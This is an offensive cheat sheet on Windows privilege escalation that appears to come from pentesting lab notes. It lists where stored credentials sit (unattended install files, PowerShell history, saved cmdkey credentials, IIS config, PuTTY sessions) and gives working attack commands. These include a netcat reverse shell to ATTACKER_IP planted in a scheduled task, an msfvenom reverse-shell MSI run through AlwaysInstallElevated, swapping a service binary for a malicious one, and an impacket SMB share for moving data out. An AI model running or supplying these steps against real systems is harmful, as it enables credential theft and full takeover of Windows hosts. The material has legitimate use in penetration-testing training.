Windows PrivEsc

Password Harvesting

The easiest way to elevate your privileges is to steal credentials from an application.

Unattended Windows Installations:

Credentials left by automatic windows installations may be in:

  • C:\Unattend.xml

  • C:\Windows\Panther\Unattend.xml

  • C:\Windows\Panther\Unattend\Unattend.xml

  • C:\Windows\system32\sysprep.inf

  • C:\Windows\system32\sysprep\sysprep.xml

<Credentials>
    <Username>Administrator</Username>
    <Domain>thm.local</Domain>
    <Password>MyPassword123</Password>
</Credentials>

Powershell History

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows Creds

cmdkey /list

runas /savedcred /user:admin cmd.exe

IIS Config

  • C:\inetpub\wwwroot\web.config

  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

From putty:

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Quick wins

Scheduled Tasks

:: View Scheduled Tasks
schtasks

:: View more info for each task
schtasks /query /tn vulntask /fo list /v

:: Check if current user can modify the task
icacls c:\path\to\vulntask

:: Spawn a NC shell (assuming NC is installed to c:\tools)
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
schtasks /run /tn vulntask

AlwaysInstallElevated

:: Requires these to be set
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Create a malicious msi to abuse the install perms:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.10.179.108 LPORT=LOCAL_PORT -f msi -o malicious.msi

Run the msi on the windows instance:

msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Service based

:: Query for service config
sc qc <service name>

:: Check permission of a binary
icacls <path to bin>

:: Create backup of service
move WService.exe WService.exe.bkp

:: Import Malicious service 
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F

:: Restart ws
sc stop windowsscheduler 
sc start windowsscheduler

Permission abuse

:: Get Permissions
whoami /priv

Attacker:

mkdir share
opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
PreviousLinux PrivEscNextWindows Persistence

Last updated